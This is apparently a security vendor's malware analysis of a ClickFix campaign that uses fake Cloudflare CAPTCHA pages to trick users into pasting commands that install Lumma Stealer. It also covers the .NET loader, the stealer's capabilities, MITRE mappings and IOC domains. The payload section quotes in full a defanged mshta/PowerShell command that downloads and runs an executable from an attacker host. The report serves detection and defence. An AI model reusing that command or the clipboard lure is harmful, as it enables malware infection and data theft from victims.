Fake CAPTCHA Lures Victims: Lumma Stealer Abuses Clipboard and PowerShell
Introduction:
We recently identified a new malware campaign using fake CAPTCHA pages to deliver Lumma Stealer, an infostealer operating under the malware-as-a-service (MaaS) model, first discovered in 2022. In previous campaigns, including those in mid-2024, attackers used ClickFix a deceptive tactic involving phishing and fake reCAPTCHA pages to targeted Google verification pages.
In this latest campaign, attackers continue to use ClickFix, leveraging phishing and fake reCAPTCHA pages to trick victims into running malicious commands copied to their clipboard. However, they have now shifted their focus to impersonating Cloudflare verification pages. In this report will explain the different stages of a ClickFix infection chain; ClickFix pages masquerading as Cloudflare reCAPTCHA, how it abuses the MSHTA and PowerShell to deliver a .NET loader.
Infection Chain:
The infection chain starts with a fake CAPTCHA page designed to trick the victim to run the malicious command. The webpage displays a deceptive message like “I am not a robot – Cloudflare Verification”, prompting the user to copy and execute a provided command in the Windows Run dialog. Once executed, the command launches mshta.exe, which runs an embedded VBScript. The VBScript creates a WScript.Shell object to execute a PowerShell command. PowerShell then uses Invoke-WebRequest to download a malicious payload (g.exe) from a remote server and saves it in the Downloads folder. Afterward, v.exe is executed using Start-Process, initiating the next stage of the attack. The v.exe file acts as a loader, which decrypts and injects the Lumma Stealer into memory.
Analysis of the Embedded JS Script:
This script is designed to execute a social engineering attack by tricking users into copying and executing malicious PowerShell commands. The attack masquerades as a Cloudflare human verification process, making it appear legitimate while silently carrying out malicious activities.
Malicious Payloads in text area Elements:
The malicious JS script contains two text area elements embedded with malicious PowerShell and MSHTA commands. The first payload executes a PowerShell command designed to download and run a malicious file (kyc.mp4) from hxxps[:]//deskbot.net. This method was used to deliver Lumma Stealer, which is commented in the JavaScript file (see Figure 3).
The second text area element, uses mshta.exe, to execute a VBScript that launches a PowerShell command.
mshta vbscript:Execute(“CreateObject(“”WScript.Shell””).Run(“”powershell -c iwr ‘hxxps[:]//kvndbb3[.]com/g[.]exe’ -o $HOME\Downloads\v.exe; Start-Process $HOME\Downloads\v.exe””,0)(window.close) ‘ I am not a robot – Cloudflare Verification ID: 5mUiAHM”)
It uses Invoke-WebRequest (iwr) to download “g.exe” from kvndbb3[.]com and saves it as “v.exe” in the Downloads folder. And further executes it using Start-Process. This method is used as evasion technique in malware attacks to bypass security measures by leveraging such as mshta.exe and WScript.Shell
Fake Human Verification Tactics:
One of the most deceptive aspects of this script is its use of a fake human verification mechanism. It mimics Cloudflare’s verification process to make users believe they need to complete an additional step. When the user clicks on the verification button, the script automatically copies the hidden malicious command to their clipboard. The victim is then tricked into pasting and executing this command in their terminal, allowing the malware to be downloaded and executed.
To make the attack more effective, the script includes multiple language translations (English, Spanish, Chinese, Arabic, Hindi, and more). This means that the attacker is targeting a global audience, increasing the chances of successful infection.
Clipboard Hijacking Mechanism:
The script employs a copyToClipboard() function, which selects the malicious PowerShell command inside the hidden text area and copies it to the clipboard when the user interacts with the verification button. This is a stealthy technique to make users unknowingly execute malicious code. As shown in figure 3 and figure 5.
Once copied, the attacker instructs the user to paste and run the command in a PowerShell terminal. If executed, the malware is downloaded, installed, and potentially used to gain persistence on the victim’s machine.
Analysis of dotnet loader:
Loader uses various anti-analysis techniques to obstruct researchers and evade detection. Our analysis revealed that the loader monitors the execution time span to detect debugging or sandbox environments. This check helps it identify potential analysis attempts, as shown in the figure 8.
During the analysis of the loader, we discovered that it decrypts the second payload using a key shown in the figure 9. The decrypted code is then injected into the process memory using APIs such as VirtualProtect, followed by WriteProcessMemory and CreateThread to execute the injected payload. This technique commonly used to evade detection and ensures the malicious code runs in memory shown on below figure 10.
Analysis of Payload (Lumma Stealer):
The payload sample is a 32bit sample with encrypted data and strings.
It prompts a dialog box with the message “Do you want to run malware”, serving as a final check before proceeding with the malware execution as shown in figure 12.
API Resolve Capability:
It has the capability to resolve APIs using API hashing technique shown in below figure 13.
Data Exfiltration
The malware leverages Windows GDI APIs, including BitBlt and CreateCompatibleBitmap, to capture the entire screen and store the captured content as a bitmap image.
It also attempts to steal sensitive data from the clipboard using the GetClipboardData API. Once the data is extracted, it establishes a command-and-control (C2C) connection to exfiltrate the stolen information.
C2C connection:
Stealer uses Mozilla/5.0 in its User-Agent string to blend in with legitimate web traffic while communicating with its C2C servers. This tactic helps the stealer to avoid detection by security solutions that monitor network traffic for anomalies.
The malware relies on seven hardcoded domains as command-and-control servers to facilitate updates, receive commands, and exfiltrate stolen data.
Conclusion:
The ClickFix campaign demonstrates how Threat actors continue to use the social engineering techniques to bypass security measures and deceive users. In this campaign by leveraging fake Cloudflare CAPTCHA pages, clipboard hijacking, and abuse of Windows utilities like MSHTA and PowerShell, the attackers efficiently deliver and execute Lumma Stealer. The .NET loader employed in this attack includes anti-analysis techniques to evade detections. The use of multiple languages in the campaign highlights a global targeting approach, making it a widespread threat.
MITRE ATT&CK Techniques:
| Name | Technique ID | Name |
| Fake captcha verification | T1566 | Phishing |
| PowerShell Execution | T1204
T1059.001 |
User Execution Command and Scripting Interpreter: PowerShell |
| Mshta Execution
|
T1218.005
T1027.009 |
System Binary Proxy Execution: Mshta Obfuscated Files or Information: Embedded Payloads |
| Screen Capture | T1113 | Screen Capture |
| Executed the encrypted payload using powershell.exe
|
T1059.001
T1027.013 |
Command and Scripting Interpreter: PowerShell Obfuscated Files or Information: Encrypted/Encoded File |
| Input Capture | T1056 | Keylogging |
| Defense Evasion | T1055.012 | Process Injection: Process Hollowing
|
| Content Injection | T1659 | Injecting malicious code into systems |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols
|
IOCs:
| MD5 | Filename |
| 9A926390B4E4EF1EEC4E9E6C80382D41 | v.exe |
| 049F8BF92786B0AFF493BC8533EE4FBC | Lumma payload |
| C2C | |
| ignoredshee.com | |
| breedertremnd.com | |
| garulouscuto.com | |
| torpdidebar.com | |
| hopeefreamed.com | |
| actiothreaz.com | |
| importenptoc.com | |
| rebeldettern.com | |
| torpdidebar.com | |
| voicesharped.com
|
|
